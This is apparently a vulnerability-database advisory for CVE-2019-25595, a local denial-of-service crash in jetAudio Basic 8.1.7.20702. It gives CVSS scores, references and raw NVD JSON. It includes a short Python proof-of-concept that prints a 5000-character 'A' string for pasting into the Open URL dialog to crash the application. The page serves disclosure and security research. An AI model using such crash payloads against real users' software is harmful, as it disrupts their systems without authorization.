CVE-2019-25595

Description

jetAudio 8.1.7.20702 Basic contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string through the URL input handler. Attackers can trigger the crash by pasting a buffer of 5000 characters into the Open URL dialog, causing the application to terminate abnormally.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

jetAudio Basic 8.1.7.20702

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept (PoC) for CVE-2019-25595
# Description: Generates a long string to crash jetAudio Basic via the Open URL dialog.
# Usage: Run the script, copy the output, and paste it into the 'Open URL' field in jetAudio.

import sys

def generate_payload():
    # jetAudio crashes when processing a URL string of approximately 5000 characters
    buffer_size = 5000
    payload = "A" * buffer_size
    return payload

if __name__ == "__main__":
    crash_string = generate_payload()
    print(f"[+] Generated payload of length: {len(crash_string)}")
    print("[+] Payload string (Copy and paste into jetAudio Open URL dialog):")
    print(crash_string)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25595
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25595
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25595/
[4] VulDB https://vuldb.com/cve/CVE-2019-25595
[5] http://www.jetaudio.com/
[6] http://www.jetaudio.com/download/
[7] https://www.exploit-db.com/exploits/46810
[8] https://www.vulncheck.com/advisories/jetaudio-basic-denial-of-service-via-url-handler

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25595", "sourceIdentifier": "[email protected]", "published": "2026-03-22T14:16:26.407", "lastModified": "2026-04-16T16:19:50.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "jetAudio 8.1.7.20702 Basic contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string through the URL input handler. Attackers can trigger the crash by pasting a buffer of 5000 characters into the Open URL dialog, causing the application to terminate abnormally."}, {"lang": "es", "value": "jetAudio 8.1.7.20702 Basic contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al proporcionar una cadena excesivamente larga a través del gestor de entrada de URL. Los atacantes pueden desencadenar el bloqueo al pegar un búfer de 5000 caracteres en el diálogo 'Abrir URL', lo que provoca que la aplicación termine de forma anómala."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-469"}]}], "references": [{"url": "http://www.jetaudio.com/", "source": "[email protected]"}, {"url": "http://www.jetaudio.com/download/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/46810", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/jetaudio-basic-denial-of-service-via-url-handler", "source": "[email protected]"}]}}